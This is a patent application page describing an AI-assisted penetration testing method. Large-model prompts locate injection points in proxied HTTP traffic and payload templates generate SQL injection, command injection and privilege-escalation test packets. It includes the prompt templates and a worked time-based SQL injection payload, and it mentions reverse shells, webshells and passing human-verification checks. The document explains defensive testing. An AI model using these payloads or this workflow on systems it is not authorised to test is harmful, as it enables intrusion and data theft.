A vulnerability detection method, electronic equipment, storage medium and program product

By setting up vulnerability attack point analysis and judgment models, and combining them with AI large-scale models to analyze data packets, test data packets are generated and vulnerability attack points are judged. This solves the problem of difficulty in identifying unknown vulnerabilities in existing technologies, improves the efficiency and accuracy of penetration testing, and reduces costs.

CN122372291APending Publication Date: 2026-07-10BEIJING TOPSEC NETWORK SECURITY TECH +2

Patent Information

Authority / Receiving Office
CN · China
Patent Type
Applications(China)
Current Assignee / Owner
BEIJING TOPSEC NETWORK SECURITY TECH
Filing Date
2026-04-22
Publication Date
2026-07-10

AI Technical Summary

Technical Problem

Existing technologies struggle to identify unknown vulnerabilities. Automated penetration testing tools have limited ability to uncover unknown vulnerabilities in both cloud and local services, while manual penetration testing is costly and inefficient.

Method used

By setting up vulnerability attack point analysis and judgment models, using pre-set payload templates and test result judgment prompts, test data packets are generated and it is determined whether there are vulnerabilities in the vulnerability attack points. Combined with AI large model, data packet analysis and parameter replacement are performed to identify unknown vulnerabilities.

Benefits of technology

It improves the efficiency of manual penetration testing and the accuracy of automated penetration testing, enables intelligent discovery of unknown vulnerabilities, and reduces costs and time.

✦ Generated by Eureka AI based on patent content.

Smart Images

  • Figure CN122372291A_ABST
    Figure CN122372291A_ABST
Patent Text Reader

Abstract

This application provides a vulnerability detection method, electronic device, storage medium, and program product. The method includes: acquiring a business data packet; performing vulnerability attack point analysis on the business data packet using pre-set attack point analysis prompts and a vulnerability attack point analysis model to obtain vulnerability attack points in the business data packet; determining target parameter information corresponding to a preset vulnerability type of the vulnerability attack point based on a pre-set payload template, wherein the pre-set payload template includes a vulnerability type and parameter information corresponding to the vulnerability type; determining a test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point; and judging the test result corresponding to the test data packet using pre-set test result judgment prompts and a judgment model to determine whether the vulnerability attack point has a vulnerability, thereby improving the intelligent discovery capability of automated penetration testing.
Need to check novelty before this filing date? Find Prior Art

Description

Technical Field

[0001] This application relates to the field of information security technology, and more specifically, to a vulnerability detection method, electronic device, storage medium, and program product. Background Technology

[0002] With the widespread use of cloud and on-premises services, cybersecurity issues have become increasingly prominent. Therefore, it is necessary to conduct penetration testing on different types of cloud and on-premises services. Currently, the method used is to obtain the fingerprints of known vulnerabilities and then match them with preset fingerprints. This can identify known vulnerabilities, but it cannot identify unknown vulnerabilities. Summary of the Invention

[0003] The purpose of some embodiments of this application is to provide a vulnerability detection method, electronic device, storage medium, and program product. Through the technical solutions of the embodiments of this application, the following steps are taken: First, a business data packet is acquired. Then, using pre-set attack point analysis prompts and a vulnerability attack point analysis model, vulnerability attack points are analyzed on the business data packet to obtain the vulnerability attack points. Next, target parameter information corresponding to a preset vulnerability type of the vulnerability attack point is determined according to a pre-set payload template, wherein the pre-set payload template includes a vulnerability type and parameter information corresponding to the vulnerability type. Finally, a test data packet corresponding to the vulnerability attack point is determined based on the target parameter information and the vulnerability attack point. Finally, a test result corresponding to the test data packet is judged using pre-set test result judgment prompts and a judgment model. To determine whether a vulnerability exists at the vulnerability attack point, this embodiment of the application sets up two models: a vulnerability attack point analysis model and a judgment model. The vulnerability attack point analysis model is then used to analyze the vulnerability attack points in the business data packets. Based on preset vulnerability types and payload templates, corresponding target parameter information is selected. Then, based on the vulnerability attack points and target parameter information, a test data packet is generated. After the test data packet is executed, the test result judgment prompts and the judgment model are used to judge the test results and determine whether a vulnerability exists at the vulnerability attack point. This allows for the identification of possible vulnerability attack points and the determination of whether a vulnerability exists at those points. It enables the identification of unknown vulnerabilities, improves the efficiency of manual penetration testing and the accuracy and discovery rate of automated penetration testing, and realizes intelligent discovery capabilities in automated penetration testing.

[0004] Firstly, some embodiments of this application provide a vulnerability detection method, including: Obtain business data packets; Using pre-set attack point analysis prompts and vulnerability attack point analysis models, vulnerability attack point analysis is performed on the business data packets to obtain the vulnerability attack points of the business data packets; The target parameter information corresponding to the preset vulnerability type of the vulnerability attack point is determined according to the preset payload template, wherein the preset payload template includes the vulnerability type and the parameter information corresponding to the vulnerability type; Based on the target parameter information and the vulnerability attack point, determine the test data packet corresponding to the vulnerability attack point; Using pre-set test result judgment prompts and judgment models, the test results corresponding to the test data packet are judged to determine whether the vulnerability attack point has a vulnerability.

[0005] Some embodiments of this application establish two models: a vulnerability attack point analysis model and a judgment model. The vulnerability attack point analysis model is then used to analyze the vulnerability attack points in the business data packets. Based on the preset vulnerability type and payload template, the corresponding target parameter information is selected. Then, based on the vulnerability attack point and target parameter information, a test data packet is generated. After the test data packet is executed, the test result judgment prompts and the judgment model are used to judge the test results and determine whether a vulnerability attack point exists. In this way, the possible location of the vulnerability attack point can be determined first, and then it can be judged whether a vulnerability exists at the vulnerability attack point. This allows for the identification of unknown vulnerabilities, improves the efficiency of manual penetration testing and the accuracy and discovery rate of automated penetration testing, and realizes the intelligent discovery capability of automated penetration testing.

[0006] Optionally, determining the target parameter information corresponding to the preset vulnerability type of the vulnerability attack point based on the preset payload template includes: Determine the preset vulnerability type corresponding to the vulnerability attack point. The preset vulnerability type includes one or more of privilege escalation testing, SQL injection, or command injection. The target parameter information corresponding to the preset vulnerability type is obtained by searching within the pre-set payload template.

[0007] Some embodiments of this application pre-set a payload template, which includes vulnerability types and parameter information corresponding to the vulnerability types. The payload template can be set according to the vulnerability type of the determined vulnerability attack point, or it can be set as needed, to obtain the corresponding target parameter information, thereby enabling testing of one or more vulnerability types on the same attack point.

[0008] Optionally, if the preset vulnerability type is SQL injection; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: The target parameter information corresponding to the SQL injection is determined in the pre-set payload template. The SQL injection includes SQL anomaly injection or blind injection testing. The target parameter information includes at least a delay time. At the vulnerability attack point, the SQL statement of the business data packet and the SQL statement of the delay time are concatenated to generate the SQL statement of the test data packet.

[0009] In some embodiments of this application, after obtaining the corresponding target parameter information based on the payload template, the service data packet and the delay time are concatenated at the attack point based on the target parameter information to obtain the test data packet.

[0010] Optionally, if the preset vulnerability type is command injection; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: Based on the command injection and the pre-set payload template, the target parameter information corresponding to the command injection is determined, wherein the target parameter information includes the address information of the preset vulnerability mining module, the modified system time and the reverse connection service; At the vulnerability attack point, the target parameter information is added to the business data packet to generate the test data packet.

[0011] Optionally, if the preset vulnerability type is an unauthorized access test; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: If the service data packet has the first permission, the first parameter information corresponding to the service data packet with the first permission is determined according to the pre-set payload template; Obtain the second parameter information corresponding to the business data packet with the second permission, where the first permission is higher than the second permission; At the vulnerability attack point, the first parameter information is replaced with the second parameter information, and the test data packet is generated based on the second parameter information.

[0012] Some embodiments of this application incorporate various vulnerability penetration plugins and payload templates, such as privilege escalation testing, SQL injection, command injection, and publicly known vulnerability exploits (EXPs). After obtaining the vulnerability attack point, the business data packet is reassembled with the target parameter information on the payload template to obtain the reassembled test data packet.

[0013] Optionally, the step of using pre-set test result judgment prompts and judgment models to judge the test results corresponding to the test data packet and determine whether the vulnerability attack point has a vulnerability includes: Based on the test results, the system determines whether one or more of the test results match the preset vulnerability results using the prompt words and the judgment model. If the test results match the preset vulnerability results, it is determined that a vulnerability exists at the vulnerability attack point.

[0014] Some embodiments of this application use large AI models to analyze attack points, replace parameters in request data packets, assemble penetration testing payloads, and replay the data packets to test whether the target has the vulnerability.

[0015] Optionally, the method further includes: If the test result is of a displayable type, the test result is displayed through the display interface of the preset vulnerability discovery device.

[0016] Optionally, the method further includes: If the test result is of the no-echo type, the test result is received through the reverse connection service of the preset vulnerability discovery device.

[0017] Optionally, obtaining the service data packet includes: The service data packet is obtained by using a preset request proxy port. The service data packet includes at least HTTP type data packet or TCP type data packet.

[0018] Some embodiments of this application perform manual penetration data packet copying and forwarding through a request proxy device, without affecting the original request process, without relying on external network devices, but at the same time compatible with external network device traffic forwarding, and also support data import from external tools.

[0019] Secondly, some embodiments of this application provide a vulnerability detection device, including: The acquisition module is used to acquire business data packets; The analysis module is used to perform vulnerability attack point analysis on the business data packet using pre-set attack point analysis prompts and vulnerability attack point analysis models, so as to obtain the vulnerability attack points of the business data packet. The determination module is used to determine the target parameter information corresponding to the preset vulnerability type of the vulnerability attack point according to the preset payload template, wherein the preset payload template includes the vulnerability type and the parameter information corresponding to the vulnerability type; The reassembly module is used to determine the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point; The judgment module is used to judge the test results corresponding to the test data packet by using pre-set test result judgment prompts and judgment models, and to determine whether the vulnerability attack point has a vulnerability.

[0020] Some embodiments of this application establish two models: a vulnerability attack point analysis model and a judgment model. The vulnerability attack point analysis model is then used to analyze the vulnerability attack points in the business data packets. Based on the preset vulnerability type and payload template, the corresponding target parameter information is selected. Then, based on the vulnerability attack point and target parameter information, a test data packet is generated. After the test data packet is executed, the test result judgment prompts and the judgment model are used to judge the test results and determine whether a vulnerability attack point exists. In this way, the possible location of the vulnerability attack point can be determined first, and then it can be judged whether a vulnerability exists at the vulnerability attack point. This allows for the identification of unknown vulnerabilities, improves the efficiency of manual penetration testing and the accuracy and discovery rate of automated penetration testing, and realizes the intelligent discovery capability of automated penetration testing.

[0021] Optionally, the determining module is configured to: Determine the preset vulnerability type corresponding to the vulnerability attack point. The preset vulnerability type includes one or more of privilege escalation testing, SQL injection, or command injection. The target parameter information corresponding to the preset vulnerability type is obtained by searching within the pre-set payload template.

[0022] Some embodiments of this application pre-set a payload template, which includes vulnerability types and parameter information corresponding to the vulnerability types. The payload template can be set according to the vulnerability type of the determined vulnerability attack point, or it can be set as needed, to obtain the corresponding target parameter information, thereby enabling testing of one or more vulnerability types on the same attack point.

[0023] Optionally, if the preset vulnerability type is SQL injection, the determining module is used to: The target parameter information corresponding to the SQL injection is determined in the pre-set payload template. The SQL injection includes SQL anomaly injection or blind injection testing. The target parameter information includes at least a delay time. At the vulnerability attack point, the SQL statement of the business data packet and the SQL statement of the delay time are concatenated to generate the SQL statement of the test data packet.

[0024] In some embodiments of this application, after obtaining the corresponding target parameter information based on the payload template, the service data packet and the delay time are concatenated at the attack point based on the target parameter information to obtain the test data packet.

[0025] Optionally, if the preset vulnerability type is command injection, the determining module is configured to: Based on the command injection and the pre-set payload template, the target parameter information corresponding to the command injection is determined, wherein the target parameter information includes the address information of the preset vulnerability mining module, the modified system time and the reverse connection service; At the vulnerability attack point, the target parameter information is added to the business data packet to generate the test data packet.

[0026] Optionally, if the preset vulnerability type is an unauthorized access test; the determining module is used to: If the service data packet has the first permission, the first parameter information corresponding to the service data packet with the first permission is determined according to the pre-set payload template; Obtain the second parameter information corresponding to the business data packet with the second permission, where the first permission is higher than the second permission; At the vulnerability attack point, the first parameter information is replaced with the second parameter information, and the test data packet is generated based on the second parameter information.

[0027] Some embodiments of this application incorporate various vulnerability penetration plugins and payload templates, such as privilege escalation testing, SQL injection, command injection, and publicly known vulnerability exploits (EXPs). After obtaining the vulnerability attack point, the business data packet is reassembled with the target parameter information on the payload template to obtain the reassembled test data packet.

[0028] Optionally, the determination module is used to: Based on the test results, the system determines whether one or more of the test results match the preset vulnerability results using the prompt words and the judgment model. If the test results match the preset vulnerability results, it is determined that a vulnerability exists at the vulnerability attack point.

[0029] Some embodiments of this application use large AI models to analyze attack points, replace parameters in request data packets, assemble penetration testing payloads, and replay the data packets to test whether the target has the vulnerability.

[0030] Optionally, the determination module is used to: If the test result is of a displayable type, the test result will be displayed through the display interface of the preset vulnerability discovery module.

[0031] Optionally, the determination module is used to: If the test result is of the no-echo type, the test result is received through the reverse connection service of the preset vulnerability mining module.

[0032] Optionally, the acquisition module is used to: The service data packet is obtained by using a preset request proxy port. The service data packet includes at least HTTP type data packet or TCP type data packet.

[0033] Some embodiments of this application perform manual penetration data packet copying and forwarding through a request proxy device, without affecting the original request process, without relying on external network devices, but at the same time compatible with external network device traffic forwarding, and also support data import from external tools.

[0034] Thirdly, some embodiments of this application provide an electronic device including a memory, a processor, and a computer program stored in the memory and executable on the processor, wherein the processor, when executing the program, can implement the vulnerability detection method as described in any embodiment of the first aspect.

[0035] Fourthly, some embodiments of this application provide a computer-readable storage medium having a computer program stored thereon, which, when executed by a processor, can implement the vulnerability detection method as described in any embodiment of the first aspect.

[0036] Fifthly, some embodiments of this application provide a computer program product, the computer program product including a computer program, wherein when the computer program is executed by a processor, it can implement the vulnerability detection method as described in any embodiment of the first aspect. Attached Figure Description

[0037] To more clearly illustrate the technical solutions of some embodiments of this application, the accompanying drawings used in some embodiments of this application will be briefly described below. It should be understood that the following drawings only show some embodiments of this application and should not be regarded as a limitation of the scope. For those skilled in the art, other related drawings can be obtained based on these drawings without creative effort.

[0038] Figure 1 A flowchart illustrating a vulnerability detection method provided in an embodiment of this application; Figure 2 A flowchart illustrating another vulnerability detection method provided in this application embodiment; Figure 3 A flowchart illustrating another vulnerability detection method provided in an embodiment of this application; Figure 4 This is a schematic diagram of the structure of a vulnerability detection device provided in an embodiment of this application; Figure 5 This is a schematic diagram of an electronic device provided in an embodiment of this application. Detailed Implementation

[0039] The technical solutions of some embodiments of this application will now be described with reference to the accompanying drawings.

[0040] It should be noted that similar reference numerals and letters in the following figures indicate similar items; therefore, once an item is defined in one figure, it does not need to be further defined and explained in subsequent figures. Furthermore, in the description of this application, terms such as "first," "second," etc., are used only to distinguish descriptions and should not be construed as indicating or implying relative importance.

[0041] Definitions: HTTP proxy: A proxy service based on the HTTP protocol that can proxy a client's HTTP access, such as a browser accessing web pages or downloading files.

[0042] Socks proxy: A general-purpose proxy service that supports multiple protocols, including HTTP, FTP requests, and other types of requests.

[0043] Burp Suite: An integrated platform for attacking web applications, containing many tools and plugin interfaces, which can proxy local browser requests and perform packet replay.

[0044] Fiddler: An HTTP protocol debugging proxy tool that can record and inspect all HTTP communications between your computer and the Internet, set breakpoints, and view all data "entering" and "leaving" Fiddler.

[0045] Large AI models: Deep learning models with a huge number of parameters, a large training data scale, and strong generalization ability and general intelligence performance, such as large language models like ChatGPT, Qwen, and DeepSeek.

[0046] TLS: Transport Layer Security, a protocol used to encrypt data transmission over a network; Unauthorized access: A common logical vulnerability that refers to the failure to implement proper access control for authenticated users. Attackers can exploit this vulnerability to disclose, modify, or destroy data without authorization, or to perform business functions outside their authorized scope.

[0047] SQL Injection: Attackers execute unauthorized database operations by inserting malicious SQL code into input fields of an application.

[0048] Command injection: A security vulnerability that allows attackers to inject and execute arbitrary operating system commands in a web application.

[0049] Against the backdrop of accelerating digital transformation, various cloud solutions have emerged, such as public cloud, private cloud, hybrid cloud, edge cloud, dedicated cloud, and distributed cloud. The flexible elastic scaling, reliable disaster recovery, high availability, and centralized management of cloud environments provide strong support for enterprise cloud adoption. However, with the widespread use of cloud services and websites, cybersecurity issues have also become prominent. Problems such as SQL and command injection due to non-standard development practices, and unauthorized access and data breaches caused by incorrect permission configurations, have become significant factors restricting the development of cloud computing and ensuring secure enterprise operations.

[0050] For enterprises, choosing a professional third-party software testing organization for penetration testing incurs significant financial and time costs. The cost and time involved in penetration testing depend on its thoroughness, sometimes taking weeks to yield results, which is not always satisfactory, especially when dealing with critical vulnerabilities. While automated penetration testing can save costs, the results depend on the quality of the penetration testing tools and the user's knowledge level. If the penetration testing software developers do not fulfill their responsibilities, automated penetration testing will be flawed and may miss critical issues. Furthermore, automated penetration testing remains functionally limited, such as its inability to handle business logic defects and its difficulty in overcoming human-machine verification restrictions. Current mainstream automated penetration testing tools primarily target known vulnerabilities, such as relying on fingerprint version matching and POC script verification, lacking the ability to uncover potential unknown vulnerabilities in new environments. There is a need for more cost-effective and efficient penetration testing of enterprise cloud environments and applications to discover unknown vulnerabilities.

[0051] In view of this, some embodiments of this application provide a vulnerability detection method, which includes: acquiring a business data packet; performing vulnerability attack point analysis on the business data packet using pre-set attack point analysis prompts and vulnerability attack point analysis models to obtain vulnerability attack points in the business data packet; determining target parameter information corresponding to a preset vulnerability type of the vulnerability attack point according to a pre-set payload template, wherein the pre-set payload template includes a vulnerability type and parameter information corresponding to the vulnerability type; determining a test data packet corresponding to the vulnerability attack point according to the target parameter information and the vulnerability attack point; and judging the test result corresponding to the test data packet using pre-set test result judgment prompts and judgment models to determine whether the vulnerability attack point exists. In this embodiment of the application, two models are set up: a vulnerability attack point analysis model and a judgment model. The vulnerability attack point analysis model is then used to analyze the vulnerability attack points of the business data packets. Then, according to the preset vulnerability type and payload template, the corresponding target parameter information is selected. Based on the vulnerability attack point and target parameter information, a test data packet is generated. After the test data packet is executed, the test result judgment prompt and judgment model are used to judge the test result and determine whether there is a vulnerability at the vulnerability attack point. In this way, the possible location of the vulnerability attack point can be determined first, and then it can be judged whether there is a vulnerability at the vulnerability attack point. This can identify unknown vulnerabilities, improve the efficiency of manual penetration testing and the accuracy and discovery rate of automated penetration testing, and realize the intelligent mining capability of automated penetration testing.

[0052] like Figure 1 As shown, an embodiment of this application provides a vulnerability detection method, the method comprising: S101, Obtain the business data packet; Specifically, the embodiments of this application are applied to a vulnerability detection system, wherein the vulnerability detection system includes a client terminal and a target terminal. The client terminal may be a user's computer, etc., and the target terminal may be a server or various types of clouds, such as public cloud, private cloud, hybrid cloud, edge cloud, dedicated cloud, and distributed cloud.

[0053] In this embodiment, a request proxy interface and a vulnerability mining module are configured on the client terminal. The client terminal sends a business data packet to the target terminal, obtains the business data packet using the request proxy interface, copies the business data packet, and sends the copied business data packet to the vulnerability mining module. The business data packet can be a query data packet.

[0054] S102. Using pre-set attack point analysis prompts and vulnerability attack point analysis models, perform vulnerability attack point analysis on the business data packet to obtain the vulnerability attack points of the business data packet. Specifically, the client terminal is equipped with attack point analysis prompts and vulnerability attack point analysis models. The vulnerability attack point analysis model is an AI large model or a trained neural network model. The business data packets are input into the vulnerability attack point analysis model through the vulnerability mining module. The vulnerability attack point analysis model analyzes the vulnerability attack points in the business data packets based on the attack point analysis prompts and marks each vulnerability attack point to obtain an annotated data packet.

[0055] For example, the attack point analysis hints are as follows: In a command injection vulnerability scenario, the example attack point analysis hints ({content} is a variable binding, which will be replaced with the specific data packet content when invoked): You are a professional web security analysis assistant. Please perform static analysis on the provided HTTP request packets to identify injection points (attack points). Please strictly adhere to the following rules: Comprehensive identification: Marks all potential injection points, including but not limited to URL paths, query parameters, request headers, cookie fields, and any user-controlled input in the request body.

[0056] Preserve session context: Do not modify or delete any critical fields used to maintain session state (such as session identifiers in cookies) to ensure that subsequent tests are not interrupted due to session expiration.

[0057] Only indicate the location: Do not replace, construct, or suggest any specific payload content. Simply specify which fields or values ​​may constitute injection points and indicate their location (e.g., "time parameter in POST body").

[0058] Based on the above principles, please analyze the following HTTP request and output the result: {content}.

[0059] S103. Determine the target parameter information corresponding to the preset vulnerability type of the vulnerability attack point according to the preset payload template, wherein the preset payload template includes the vulnerability type and the parameter information corresponding to the vulnerability type; Specifically, the client terminal determines the target parameter information corresponding to the preset vulnerability type of the vulnerability attack point based on the preset payload template and preset vulnerability type. The preset payload template includes the vulnerability type and the parameter information corresponding to the vulnerability type. Specifically, the client terminal pre-stores a payload template, which can be an EXP script. This template can carry different payloads to respond to various test results and can gain control of the target via reverse shell or by opening a shell port (bind). The payload template includes the vulnerability type and corresponding parameter information. The vulnerability type can be privilege escalation, SQL injection, or command injection, with different parameter information for each vulnerability type.

[0060] In this embodiment, target parameter information corresponding to a preset vulnerability type can be found in the payload template according to the preset vulnerability type. Then, at the determined vulnerability attack point, the labeled data packet is modified according to the target parameter information to obtain a test data packet, and then the test data packet is sent to the target terminal. In this embodiment, the preset vulnerability type can be one or more, and can be set according to the actual situation.

[0061] S104. Based on the target parameter information and the vulnerability attack point, determine the test data packet corresponding to the vulnerability attack point; Specifically, the target terminal reassembles the labeled data packet according to the target parameter information and the vulnerability attack point to obtain a test data packet corresponding to the vulnerability attack point, and sends the test data packet to the target terminal.

[0062] S105. Using pre-set test result judgment prompts and judgment models, the test results corresponding to the test data packet are judged to determine whether the vulnerability attack point has a vulnerability.

[0063] Specifically, after receiving the test data packet, the target terminal performs business operations on the test data packet. After the execution is completed, it obtains the test results corresponding to the vulnerability attack points and returns the test results to the client terminal.

[0064] The client terminal sets test result judgment prompts and a judgment model. The judgment model can be an AI model or a trained neural network model. The judgment model is used to determine whether there is a vulnerability at the vulnerability attack point based on the test results. The vulnerability mining module on the client terminal inputs the obtained test results into the judgment model. The judgment model judges the prompts based on the test results and determines whether there is a vulnerability at the attack point.

[0065] For example, the target terminal obtains a business data packet, analyzes the attack point prompts and analysis model, and determines the vulnerability attack point 1 in the business data packet. Under normal circumstances, the response time for querying a certain parameter is 1 second. By setting the preset vulnerability type to SQL delayed injection, that is, adding a 2-second delay to the response time at vulnerability attack point 1, a reconstructed test data packet is obtained. The test data packet is sent to the target terminal. After the target terminal executes the test data packet, it obtains the test result. The test result includes whether the response time is delayed by 2 seconds or not.

[0066] After the target terminal executes the test data packet, it obtains the test result, which includes the determination that there is a 2-second delay. The judgment model judges the test result and the preset result corresponding to the delay injection at the attack point. If the two match, it is determined that there is a vulnerability at the attack point.

[0067] The test result prompt can be as follows: {content} is a variable binding, which will be replaced with the specific observed data when called: You are a senior vulnerability verification engine. Based on the following three observation data provided by the vulnerability discovery tool, please make a comprehensive judgment on the results of this injection attempt. Please strictly rely on factual evidence for logical reasoning and avoid subjective assumptions.

[0068] Input data description: Response packet Includes the original HTTP response content, status code, response headers, and response body; Pay special attention to: response time (used to determine delayed injection), error messages, content differences, etc. Out-of-band service log Record whether any external connection requests arrive at the preset listening server (such as DNS, HTTP, LDAP, etc.) during the attack. Includes: connection source IP, timestamp, protocol type, and carried identifiers (such as payload unique ID); Session service state (session) Indicate whether a persistent interactive channel (such as a Webshell session or a reverse Shell connection) has been established on the target system. This includes: whether the new session is active, whether the command execution echo is readable, and whether file writing is effective. Judgment rules: If the response data packet contains an anomaly consistent with the payload behavior (such as significant delay ≥ preset threshold, error stack leakage, content tampering), it is considered that the echo injection may have been successful.

[0069] If the return connection service receives an outbound request that matches the unique identifier of the current payload within the attack window, it is determined that the no-echo command execution / OOB injection was successful.

[0070] If the session service detects a new valid interactive session triggered by this injection (such as the shell corresponding to PHPSESSID being activated, or the uploaded webshell being accessible), it determines that the getshell was successful.

[0071] These three factors can stand alone or be combined to enhance confidence. If none of them show a positive signal, the vulnerability is considered unconfirmed.

[0072] Output format requirements: Please output the judgment conclusion in the following structure (output only JSON, without explanation): json { "injection_success": true|false, "evidence_type": ["response_based", "oob_callback", "session_established"], "confidence_level": "high|medium|low", "details": { "response_anomaly": { "detected": true|false, "description": "A brief description, such as 'Response delay reached 5.2 seconds, exceeding the threshold of 3 seconds'"}, "oob_callback_received": { "detected": true|false, "callback_id": "Unique identifier or null"}, "session_active": { "detected": true|false, "session_id": "e.g., PHPSESSID or shell path"} }}``` Please determine the results of this injection test based on the above rules.

[0073] Test result data: {content} In this embodiment, the vulnerability discovery model data comes from manual penetration testing. The automated penetration route can be adjusted through manual penetration testing. When human-machine verification is triggered, the human-machine verification can be completed by the manual penetration route, and the vulnerability discovery device can bypass the verification.

[0074] Some embodiments of this application set up two models: a vulnerability attack point analysis model and a judgment model. The vulnerability attack point analysis model is then used to analyze the vulnerability attack points in the business data packets. Then, based on the preset vulnerability type and payload template, the corresponding target parameter information is selected. Subsequently, a test data packet is generated based on the vulnerability attack point and the target parameter information. After the test data packet is executed, the test result judgment prompt and judgment model are used to judge the test result and determine whether there is a vulnerability at the vulnerability attack point. In this way, the possible location of the vulnerability attack point can be determined first, and then it can be judged whether there is a vulnerability at the vulnerability attack point. This can identify unknown vulnerabilities, improve the efficiency of manual penetration testing and the accuracy and discovery rate of automated penetration testing, and realize the intelligent mining capability of automated penetration testing.

[0075] Another embodiment of this application further supplements the description of the vulnerability detection method provided in the above embodiments.

[0076] like Figure 2 As shown, a request proxy port is configured on the client terminal to perform manual penetration testing on the target terminal. After receiving the business data packet, the request proxy copies it, forwarding one copy directly to the target terminal and returning response data. This copy can be used for manual penetration testing. The other copy of the business data packet is forwarded to the vulnerability discovery module. The vulnerability discovery module uses an AI agent to analyze the attack points of the data packet, assemble the payload based on the marked points, and replay the data packet, which is the test data packet. The vulnerability discovery module parses the response data packet of the test data packet, which is the test result, and feeds the test result back to the AI ​​agent. The AI ​​agent analyzes the test result based on the large AI model and further fine-tunes the payload template or provides the test result based on the judgment result.

[0077] Request Proxy Device: A proxy device installed on the client terminal, acting as an intermediary between the client and target terminals. This device is responsible for lossless traffic replication, supports TLS decryption, and is compatible with Burp Suite / Fiddler. It receives incoming request data packets by opening a proxy listening port, replicates them, and then sends them to the test target and vulnerability discovery device, respectively.

[0078] The specific implementation technology depends on the protocol of the access target. For example, for HTTP requests, this is an HTTP proxy, while for TCP requests, it's a Socks proxy. The device supports configuring TLS certificates; to proxy HTTPS requests, a TLS certificate must be configured and trusted on the client terminal. The device is designed to be compatible with existing open-source request proxy frameworks, such as BurpSuite and Fiddler for HTTP requests. Using this device as an extension plugin for such frameworks can fulfill request proxy forwarding requirements.

[0079] Vulnerability discovery device: This is an automated vulnerability discovery device, including attack point annotation, payload assembly, replay execution, and multi-channel feedback (response / reverse connection service / reverse connection shell). It interacts with an AI intelligent agent plugin and a large AI model to achieve intelligent packet analysis and decision-making. It has built-in various vulnerability penetration plugins and payload templates, such as privilege escalation testing, SQL injection, command injection, and publicly known vulnerability exploits (EXPs). The device can be configured with vulnerability penetration plugins, EXP lists, and payload encoding via a web interface. For vulnerabilities without feedback, it supports various penetration test result feedback methods, such as reverse shells, time delays, and reverse connection service records. In this embodiment, it is responsible for receiving request packets forwarded from the request proxy device, performing attack point analysis through the large AI model, replacing parameters in the request packets, assembling penetration test payloads, and replaying the packets to test whether the target has the vulnerability.

[0080] Optionally, obtaining the service data packet includes: The service data packet is obtained by using a preset request proxy port. The service data packet includes at least HTTP type data packet or TCP type data packet.

[0081] Specifically, step 1: Configure the request proxy port locally on the client terminal, and send business data packets to the target terminal. The specific request method is related to the protocol supported by the target terminal. For example, if the target terminal is a Web application or Web Service, it will initiate an HTTP request. If the target terminal is a TCP listener, the business data packet will be a TCP data packet request.

[0082] Step 2: After the requesting agent receives the business data packet sent by the client terminal, it copies the business data packet. One copy is directly forwarded to the target terminal, and the response data is fed back to the client terminal without blocking the tester's normal access. The other copy is forwarded to the vulnerability discovery device.

[0083] This application embodiment performs manual penetration data packet copying and forwarding through a request proxy device, without affecting the original request process. It does not require external network devices, but is compatible with traffic forwarding from external network devices and supports data import from external tools (such as Burp Suite and Fiddler). The request proxy device supports TLS certificate configuration and can handle HTTPS encrypted communication scenarios.

[0084] Some embodiments of this application perform manual penetration data packet copying and forwarding through a request proxy device, without affecting the original request process, without relying on external network devices, but at the same time compatible with external network device traffic forwarding, and also support data import from external tools.

[0085] Step 3: Automated Vulnerability Discovery: The data packets received by the vulnerability discovery device are raw request data packets, which can be directly replayed using TCP and HTTP protocol clients. After receiving the data packets, the vulnerability discovery device uses an AI agent to analyze and mark attack points in the data packets. Here, the AI ​​agent only needs to handle the tasks of attack point analysis and marking, and partial test result judgment. Repetitive tasks such as payload assembly and combination are implemented programmatically by the vulnerability discovery device, which can significantly improve execution efficiency and reduce token consumption.

[0086] The vulnerability discovery device performs parameter replacement and assembly based on the configured test scope and payload type. Because the parameters in the request data packet are not fixed, the vulnerability discovery device will test each parameter in the request one by one. To avoid request failure due to the replacement of critical credential parameters, testers can configure a whitelist of parameters in the vulnerability discovery device's web interface; parameters within the whitelist will be skipped.

[0087] Optionally, determining the target parameter information corresponding to the preset vulnerability type of the vulnerability attack point based on the preset payload template includes: Determine the preset vulnerability type corresponding to the vulnerability attack point. The preset vulnerability type includes one or more of privilege escalation testing, SQL injection, or command injection. The target parameter information corresponding to the preset vulnerability type is obtained by searching within the pre-set payload template.

[0088] Some embodiments of this application pre-set a payload template, which includes vulnerability types and parameter information corresponding to the vulnerability types. The payload template can be set according to the vulnerability type of the determined vulnerability attack point, or it can be set as needed, to obtain the corresponding target parameter information, thereby enabling testing of one or more vulnerability types on the same attack point.

[0089] Optionally, if the preset vulnerability type is SQL injection; The step of determining the test data packet corresponding to the vulnerability attack point based on the target parameter information and the vulnerability attack point, and obtaining the test data packet, includes: The target parameter information corresponding to the SQL injection is determined in the pre-set payload template. The SQL injection includes SQL anomaly injection or blind injection testing. The target parameter information includes at least a delay time. At the vulnerability attack point, the SQL statement of the business data packet and the SQL statement of the delay time are concatenated to generate the SQL statement of the test data packet.

[0090] For example, after identifying the attack point, we will select SQL injection as the preset vulnerability type for vulnerability testing and provide a detailed explanation: Example 1: If an audit management system allows users to filter by entering the visitor's IP address on the log query page, the request data packet would look like this: POST / audit / log HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2 IP address: 192.168.1.22 The corresponding backend query SQL snippet for this request is as follows. sql = "select * from audit_log log where log.ip = '" + ip + "'" Under the above normal query parameters, the final executed SQL statement is as follows: query the operation log records of the host 192.168.1.22. select * from audit_log log where log.ip = '192.168.1.22' The data packet returned the following content, with a response time of 1 second. HTTP / 1.1 200 OK Content-Type: application / json {'data':[{'log':'xxlog1','time':'2020-01-01T00:00:00'},...]} The data returned by the AI ​​big data model after analyzing the attack points of the above request data packet is as follows: POST / audit / log HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2 ip=${1} The AI ​​model identifies potential attack points (IP=${1}) and retains session information (cookies). The resulting SQL delayed injection data packet is as follows: POST / audit / log HTTP / 1.1 Host: 10.10.254.28:8080 Cookie: PHPSESSID=lb1dco6q2 ip=192.168.1.22'and sleep(2) -- The SQL statement executed in the above query is as follows: select * from audit_log log where log.ip = '192.168.1.22' and sleep(2) --' Because the backend functionality involves 